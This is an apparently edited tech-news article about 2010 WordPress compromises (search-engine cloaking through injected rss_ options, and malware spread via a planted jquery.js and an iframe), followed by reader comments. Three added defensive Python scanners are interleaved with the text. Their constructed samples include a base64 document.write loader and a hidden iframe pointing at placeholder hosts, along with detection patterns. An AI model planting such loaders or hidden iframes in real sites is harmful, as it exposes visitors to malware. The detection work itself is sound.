WordPress Hack Terrifies Webmasters - gHacks Tech News


Reports about a WordPress hack affecting self-hosted WordPress blogs appeared on the Internet in March. The hack seems to affect WordPress 2.9.2, the latest version of the blogging platform at the time of writing, and possibly older versions as well.

To make matters worse, webmasters appear to be facing two, possibly unrelated, issues.

One is a malware attack that uses hacked blogs to spread malware to their visitors; the other uses cloaking techniques to serve search engine spiders a different version of the blog than regular visitors and administrators see.

The cloaking hack appeared on radars in March when bloggers and hosting providers mentioned compromised sites. Media Temple, for instance, stated on March 2nd that "a number of customer sites [..] have been compromised".


Media Temple identified several patterns the attackers used, one of which placed files with random-string names in the document root of the blog.

But Media Temple-hosted WordPress blogs were not the only ones hit. Reports from webmasters hosted by GoDaddy, Network Solutions and VPS.net indicated that the attack was not specific to one web hosting company.

Fast forward to April 6. Christopher Penn discovered that his blog had been compromised. The hack had injected a new option into the wp_options table of his site and used encoded JavaScript for obfuscation; the injected option's name always started with rss_.

Deleting that option from the database table stopped the cloaking he was experiencing. The entry reappeared, however, which suggested that his blog was still open to the attack and that something on the site or server was still executing code that re-added the database entries.

The vulnerability itself has not been identified yet. Chris suggested that the entry point was either the TimThumb plugin or the outdated version of Magpie (the MagpieRSS feed parser) that WordPress ships with; neither has been confirmed.
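The option-name pattern described above suggests a first check a webmaster can run against a dump of the wp_options table. The following Python script is an added example, not code from the article or from Christopher Penn's write-up. It assumes rows in the (option_name, option_value, autoload) shape of wp_options and relies on an assumption about stock WordPress 2.9.x behaviour: the bundled MagpieRSS parser caches feeds under option names of the form rss_<md5> and rss_<md5>_ts with autoload set to "no", and the cached values are serialized PHP data. Anything else under the rss_ prefix, or any value that decodes to script markup, is worth a look. The sample rows are constructed.

```python
"""Heuristic scan of wp_options rows for an injected rss_-prefixed option."""
import base64
import binascii
import re

# WordPress 2.x caches MagpieRSS feed data under rss_<md5> and rss_<md5>_ts
# with autoload = "no", so the prefix alone proves nothing. (Assumption about
# stock 2.9.x behaviour; adjust the patterns if your install differs.)
MAGPIE_CACHE_KEY = re.compile(r"^rss_[0-9a-f]{32}(_ts)?$")
SERIALIZED_PHP = re.compile(r'^(O:\d+:"|a:\d+:\{)')
# Markers of the encoded JavaScript the article describes.
PAYLOAD_MARKERS = re.compile(
    r"<script|<iframe|eval\(|document\.write|unescape\(|String\.fromCharCode", re.I)
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def decode_if_base64(value):
    """Return the decoded text if value is a single base64 blob, else None."""
    compact = "".join(value.split())
    if not BASE64_BLOB.match(compact):
        return None
    try:
        return base64.b64decode(compact, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def classify_option(name, value, autoload):
    """Return the reasons a wp_options row looks injected; an empty list means benign."""
    reasons = []
    decoded = decode_if_base64(value)
    haystack = value if decoded is None else value + "\n" + decoded
    if PAYLOAD_MARKERS.search(haystack):
        reasons.append("script/iframe/eval markers in option_value"
                       + (" (after base64 decoding)" if decoded is not None else ""))
    if not name.startswith("rss_"):
        return reasons
    if not MAGPIE_CACHE_KEY.match(name):
        reasons.append("rss_ name is not shaped like a Magpie cache key")
    if autoload == "yes":
        reasons.append("rss_ option is autoloaded; Magpie cache entries are not")
    if name.endswith("_ts"):
        if not value.isdigit():
            reasons.append("_ts entry is not a unix timestamp")
    elif not SERIALIZED_PHP.match(value):
        reasons.append("value is not serialized PHP cache data")
    return reasons


def find_suspicious_options(rows):
    """rows: iterable of (option_name, option_value, autoload). Returns [(name, reasons)]."""
    hits = []
    for name, value, autoload in rows:
        reasons = classify_option(name, value, autoload)
        if reasons:
            hits.append((name, reasons))
    return hits


# Constructed payload: base64 of a document.write/unescape loader, as an attacker
# might store it. The host inside it is a placeholder, not a real indicator.
PAYLOAD = base64.b64encode(
    b'<script>document.write(unescape("%3Ciframe%20src%3Dhttp%3A%2F%2Fbad.example.invalid%3E"))'
    b'</script>').decode()

# Constructed rows modelled on a wp_options dump, not real data.
SAMPLE_ROWS = [
    ("siteurl", "http://blog.example.com", "yes"),
    ("rss_" + "3f" * 16, 'O:9:"MagpieRSS":1:{s:5:"items";a:0:{}}', "no"),   # legit cache
    ("rss_" + "3f" * 16 + "_ts", "1270512000", "no"),                     # legit timestamp
    ("rss_2e3f9c0ab", PAYLOAD, "yes"),          # payload hiding under the rss_ prefix
    ("rss_" + "ab" * 16, PAYLOAD, "no"),        # same payload, name shaped like a cache key
]

if __name__ == "__main__":
    for option_name, why in find_suspicious_options(SAMPLE_ROWS):
        print(option_name)
        for reason in why:
            print("  -", reason)
```

Because the article reports that the entry came back after deletion, treat a hit as a symptom rather than the infection: also diff the theme and wp-includes files against a clean copy and find out what is writing to the table, instead of only deleting the row.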

There has been no response yet from the WordPress developers regarding this issue.

To make matters worse, a second attack has hit WordPress blogs, this time to spread malware. It is not yet clear whether the two attacks are related, but it seems likely that they are.

Frank Gruber posted information about the second attack on his blog, which, ironically, appears to have been compromised as well.

The virus somehow infiltrates WordPress, adds a new file called jquery.js to your scripts directory and then inserts a reference to that file into the header or footer files of your site. It also inserts an iframe that calls a third-party site known for malware or other malicious activity.

The Trend Micro blog shares additional information about the malware that is being spread via this attack. The attack "leads into an infection chain that leads to various malware, including a rogue antivirus[..]".
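The file-and-iframe pattern Frank Gruber describes can be checked for mechanically. The following Python snippet is an added example, not code from the article, Frank Gruber or Trend Micro. It parses header/footer markup and flags script tags that load from another host or from a jquery.js outside WordPress' own copy, assumed here to live at wp-includes/js/jquery/jquery.js as in a stock 2.9.x install, plus iframes that point off-site, with hidden or one-pixel ones called out separately. It also checks a list of document-root paths for stray jquery.js files. The markup below is constructed; malware.example.invalid is a placeholder host.

```python
"""Flag injected <script> and <iframe> tags in WordPress theme header/footer markup."""
from html.parser import HTMLParser
from urllib.parse import urlsplit
import posixpath

# Where a stock WordPress 2.9.x install keeps its own jQuery (assumed location).
LEGIT_JQUERY = "/wp-includes/js/jquery/jquery.js"
ZERO_SIZE = {"0", "1", "0px", "1px"}


def _is_stock_jquery(path):
    """True if a root-relative path ends in WordPress' own jquery.js (subdirectory installs allowed)."""
    return ("/" + path.lstrip("/")).endswith(LEGIT_JQUERY)


class InjectionFinder(HTMLParser):
    """Collects (kind, url) findings while parsing rendered header.php/footer.php output."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def _external(self, url):
        host = urlsplit(url).hostname   # None for relative URLs, set for http:// and // forms
        return host is not None and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            src = a["src"]
            if self._external(src):
                self.findings.append(("external-script", src))
            elif urlsplit(src).path.endswith("jquery.js") and not _is_stock_jquery(urlsplit(src).path):
                # A jquery.js anywhere but WordPress' own copy is the pattern described.
                self.findings.append(("rogue-jquery", src))
        elif tag == "iframe":
            src = a.get("src", "")
            if not self._external(src):
                return
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (a.get("width") in ZERO_SIZE or a.get("height") in ZERO_SIZE
                      or "display:none" in style or "visibility:hidden" in style)
            self.findings.append(("hidden-external-iframe" if hidden else "external-iframe", src))


def scan_markup(markup, site_host):
    """Return the list of (kind, url) findings for one rendered page or template."""
    finder = InjectionFinder(site_host)
    finder.feed(markup)
    finder.close()
    return finder.findings


def stray_jquery_files(relative_paths):
    """Given paths relative to the document root, return every jquery.js outside the stock location."""
    return [p for p in relative_paths
            if posixpath.basename(p) == "jquery.js" and not _is_stock_jquery(p)]


# Constructed header output, not from a real compromised site; the iframe host is a placeholder.
SAMPLE_HEADER = """<html><head>
<script type="text/javascript" src="/wp-includes/js/jquery/jquery.js?ver=1.3.2"></script>
<script type="text/javascript" src="/wp-content/themes/sample/scripts/jquery.js"></script>
</head><body>
<iframe src="http://malware.example.invalid/in.cgi?3" width="1" height="1" style="visibility: hidden"></iframe>
"""

if __name__ == "__main__":
    for kind, url in scan_markup(SAMPLE_HEADER, "blog.example.com"):
        print(kind, url)
```

Run it against the rendered front page (what visitors and spiders receive) as well as against the theme files themselves; the article's cloaking variant means the two can differ, and a clean header.php on disk does not prove that the served page is clean.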

To sum it up:

  • Several WordPress blogs running the latest official version have been successfully compromised.
  • Attackers either manipulate the blog to spread malware (the more recent attack) or to cloak links that are only visible to search engines.
  • It is currently not clear how the attacks are carried out.
  • Some information is available on how to disinfect a blog.

Update: The most recent versions of WordPress have resolved the issues. If you have not updated yet, it is highly recommended that you do so immediately.

WordPress webmasters should check their blogs immediately to make sure they have not been compromised. A WordPress plugin like Antivirus might also help prevent a successful attack.
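Whatever the ultimate entry point turns out to be, the comment thread below attributes the Network Solutions incident to a rights problem and notes that wp-config.php, in the root folder of the installation, holds the database credentials in clear text. A practical check, assuming the rights problem is file permissions on a shared host, is to audit the document root for a wp-config.php that other accounts can read and for world-writable directories where files with random names, like those Media Temple described, could be dropped. The following Python script is an added example, not from the article or from any of the commenters; the SAMPLE_ENTRIES snapshot is constructed, and the thresholds (other-readable config, world-writable anything) are the editor's assumptions rather than anything the page states.

```python
"""Audit file modes in a WordPress document root for shared-hosting exposures."""
import os
import stat
import sys

# Files whose contents must never be readable by other accounts on a shared host.
SECRET_FILES = {"wp-config.php"}


def mode_findings(relpath, mode):
    """Return findings for one path given its st_mode (pure function, easy to test)."""
    findings = []
    name = os.path.basename(relpath)
    if stat.S_ISDIR(mode):
        if mode & stat.S_IWOTH:
            findings.append("world-writable directory: any account on the host can drop files here")
        return findings
    if name in SECRET_FILES:
        if mode & stat.S_IROTH:
            findings.append("wp-config.php readable by every user on the host")
        if mode & stat.S_IRGRP:
            findings.append("wp-config.php group-readable; make sure the group is only the web server")
    if mode & stat.S_IWOTH:
        findings.append("world-writable file: can be modified by any other account")
    return findings


def audit_entries(entries):
    """entries: iterable of (relative path, st_mode). Returns [(path, findings)] for paths with findings."""
    out = []
    for relpath, mode in entries:
        found = mode_findings(relpath, mode)
        if found:
            out.append((relpath, found))
    return out


def walk_docroot(root):
    """Yield (relpath, st_mode) for every directory and file under root without following symlinks."""
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            yield os.path.relpath(full, root), os.lstat(full).st_mode


# Constructed snapshot of a shared-hosting docroot, with modes as os.stat would report them.
SAMPLE_ENTRIES = [
    (".", stat.S_IFDIR | 0o755),
    ("wp-config.php", stat.S_IFREG | 0o644),        # the exposure the comments discuss
    ("wp-content/uploads", stat.S_IFDIR | 0o777),   # anyone on the box can write here
    ("index.php", stat.S_IFREG | 0o644),            # fine: code is public anyway
]

if __name__ == "__main__":
    entries = walk_docroot(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_ENTRIES
    for path, findings in audit_entries(entries):
        print(path)
        for finding in findings:
            print("  -", finding)
```

The right target mode depends on how PHP runs: where PHP executes as the account owner (suPHP, CGI or FastCGI per user) wp-config.php can be 0600; where the web server runs as a separate user (mod_php) it needs group read, so 0640 with a group that contains only that user. Either way, "other" should have no bits at all.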


    Comments

    1. Manpreet Singh Rehsi said on April 12, 2010 at 5:02 pm

      This is really a big issue to worry about. I shall be waiting for a security fix from the WordPress developers in a few days.

      1. Mark Jaquith said on April 13, 2010 at 11:35 pm

        The WordPress team currently has no evidence to suggest that this is a security issue with WordPress itself. WordPress is often the victim subsequent to other types of security breaches. Because WordPress sites are web-facing and usually are well ranked, they are a juicy target. So however a hacker gets in, if they find a WordPress blog once they’re in there, they’ll be tempted to use their existing access to mess with the WordPress install.

        1. Martin said on April 13, 2010 at 11:45 pm

          Mark, it was a rights problem, as you probably already know.

    2. HNicolai said on April 12, 2010 at 11:12 pm

      “Problem” solved :)

      http://www.theregister.co.uk/2010/04/12/network_solutions_wordpress_hack/

      But I don’t think this is the last time we’re going to see hacks like that one :(

      And btw, why is WordPress storing the password as clear text? A simple salt + md5 would at least make the hack slower.

      1. Martin said on April 13, 2010 at 12:43 am

        Nice find HNicolai. Don’t most configuration files store the database information in plain text? I think all the major PHP apps that I installed do it that way.

      2. Mark Jaquith said on April 13, 2010 at 11:32 pm

        There is no other way to store it. It must be in clear text. Period.

      3. Fenix said on April 14, 2010 at 8:49 am

        Looks like you have never seen your wp_options table; your password is stored as an MD5 hash.

        1. Martin said on April 14, 2010 at 9:45 am

          Fenix, we are talking about the file containing the database connection information, which is located in the root folder of the WordPress installation, not the database itself.

    3. ras1643 said on May 12, 2010 at 12:54 am

      I agree with Martin’s comment about PHP, that passwords in the config file must be in text format. My website was recently attacked and GoDaddy was able to identify the files that contain malware, a total of 300 files. I deleted all the files and changed my FTP password. Luckily I don’t use SSH.

    4. David Dede said on May 14, 2010 at 8:27 pm

      As far as that SEO spam technique being used, we also found this:
      http://blog.sucuri.net/2010/05/it-is-not-over-seo-spam-on-sites.html

      These random PHP files read from the .files directory, still available on thousands of sites.
